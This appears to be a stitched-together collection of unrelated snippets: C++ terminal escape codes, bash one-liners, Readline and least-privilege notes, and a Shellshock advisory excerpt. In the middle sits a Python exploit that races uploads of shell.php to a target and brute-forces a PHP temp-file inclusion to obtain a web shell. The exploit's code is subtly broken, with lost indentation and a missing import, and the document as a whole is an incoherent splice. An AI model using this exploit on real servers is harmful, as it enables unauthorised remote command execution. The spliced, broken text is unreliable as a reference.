/ scroll down a bit to avoid visual glitch when the screen
// area shrinks by one row
std::cout << "\n";

// save cursor
std::cout << "\0337";

// set scroll region (this will place the cursor in the top left)
std::cout << "\033[0;" << std::to_string(nr_rows - 1) << "r";

// restore cursor but ensure its inside the scrolling area
std::cout << "\0338";
static const char *move_cursor_up = "\033[1A";
std::cout << move_cursor_up;

printf >&2 '%s: reading from stdin...' "$(basename "$0")"
stdin=$(cat <&0)
printf >&2 '\r\033[0K'

echo "$stdin"

import itertools
import requests
import sys

print('[+] Trying to win the race')
f = {'file': open('shell.php', 'rb')}
for _ in range(4096 * 4096):
requests.post('http://target.com/index.php?c=index.php', f)

print('[+] Bruteforcing the inclusion')
for fname in itertools.combinations(string.ascii_letters + string.digits, 6):
url = 'http://target.com/index.php?c=/tmp/php' + fname
r = requests.get(url)
if 'load average' in r.text: # <?php echo system('uptime');
print('[+] We have got a shell: ' + url)
sys.exit(0)

print('[x] Something went wrong, please try again')

The Principle of Least Privilege says that software shouldn't be executed with more authority than it needs to get its job done. Unfortunately, following this principle is hard; most operating systems are configured so that the scripts and programs you run can do anything you can.

Although the Readline library comes with a set of default keybindings, it is possible to modify these by putting commands into a .inputrc file, typically in the home directory. The name of this file is taken from the value of the shell variable INPUTRC. If that variable is unset, the default is ~/.inputrc If that file does not exist or cannot be read, the ultimate default is /etc/inputrc

Stephane Chazelas discovered a vulnerability in bash, related to how
environment variables are processed: trailing code in function
definitions was executed, independent of the variable name.

In many common configurations, this vulnerability is exploitable over
the network.

SOme stuff on bash programming

echo $(printf %08X 256 | grep -o .. | tac | tr -d '\n')

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

for i in pidof python; do cat /proc/$i/cmdline | tr "\0" " " | sed "s/$/ $i\n/"; done

Check if stdout is a tty , from different languages.

Lots of useful bash scripting tips:

$? exit status of the last command (${PIPESTATUS} for pipelined commands)

avoid tempory files:
diff <(wget -O - url1) <(wget -O - url2)